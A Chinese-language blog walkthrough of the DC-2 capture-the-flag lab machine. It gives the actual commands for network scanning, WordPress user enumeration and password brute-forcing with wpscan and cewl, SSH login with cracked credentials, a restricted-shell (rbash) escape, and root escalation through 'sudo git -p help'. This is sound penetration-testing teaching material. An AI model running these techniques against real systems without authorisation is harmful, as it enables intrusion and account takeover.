zoukankan      html  css  js  c++  java
  • DC-2靶机渗透

    实验环境

    1. Vmware workstation
    2. kali2020
    3. DC-2
    4. DC-2靶机网卡和kali是一样的
    5. kali 的ip地址:192.168.6.129

    主机发现

     第一种方法:使用VMware去查看DC-2靶机的MAC地址;第二种方法:直接进行主机发现。用命令扫描网段存活主机。

    nmap -sP 192.168.6.0/24

     发现靶机IP地址为:192.168.6.132

    信息收集

    端口扫描

    命令1:nmap -A -T4 -p- 192.168.6.132
    命令2:nmap -sV 192.168.6.132

     开放了80和7744端口

    访问一下,发现无法访问

    修改攻击机的hosts文件,将以下内容写入

    192.168.6.132 DC-2

     

     发现还是不让我访问,我就修改了Windows下的hosts

     然后就能访问了

    发现flag1

     有关键字cewl,字面意思大概就是要爆破出用户名和密码了

    查看指纹信息,知道是wordpressCMS

    利用wpscan扫一下用户名

    wpscan --url http://dc-2/ -e u

     将用户名存到文件

    使用cewl生成密码

    cewl -w pass.txt http://dc-2

    攻击

    爆破

    wpscan --ignore-main-redirect --url 192.168.6.132 -U users.txt -P pass.txt --force

    出来了

     后台地址是在首页地址后加wp-login.php

    用jerry登录发现flag2,tom页面没发现什么

    尝试ssh远程登录

    我们尝试用tom用户进行登录ssh服务,密码:parturient
    用户:jerry,密码:adipiscing
    命令:ssh tom@192.168.6.132 -p 7744

    输入命令,发现受rbash的限

    突破rbash

    BASH_CMDS[a]=/bin/sh;a
    /bin/bash

    使用并添加环境变量

    export PATH=$PATH:/bin/

     他说在Jerry里,那我们切换

     有点白痴,居然cd /了

    说不是最终的flag,提示git

    提权

    sudo git -p help
    
    !/bin/bash

    即可登录root用户

     去根目录找

    结束。

  • 相关阅读:
    codeforces 505E Mr. Kitayuta vs. Bamboos 题解
    codeforces 568C New Language 题解
    [AGC020E] Encoding Subsets 题解
    技巧瞎扯
    [AGC028C] Min Cost Cycle 题解
    [AGC018D] Tree and Hamilton Path 题解
    codeforces 1217D Coloring Edges 题解
    [AGC003C] BBuBBBlesort! 题解
    [AGC037C] Numbers on a Circle 题解
    [USACO09Open] Tower of Hay 题解
  • 原文地址:https://www.cnblogs.com/tac2664/p/14395418.html
Copyright © 2011-2022 走看看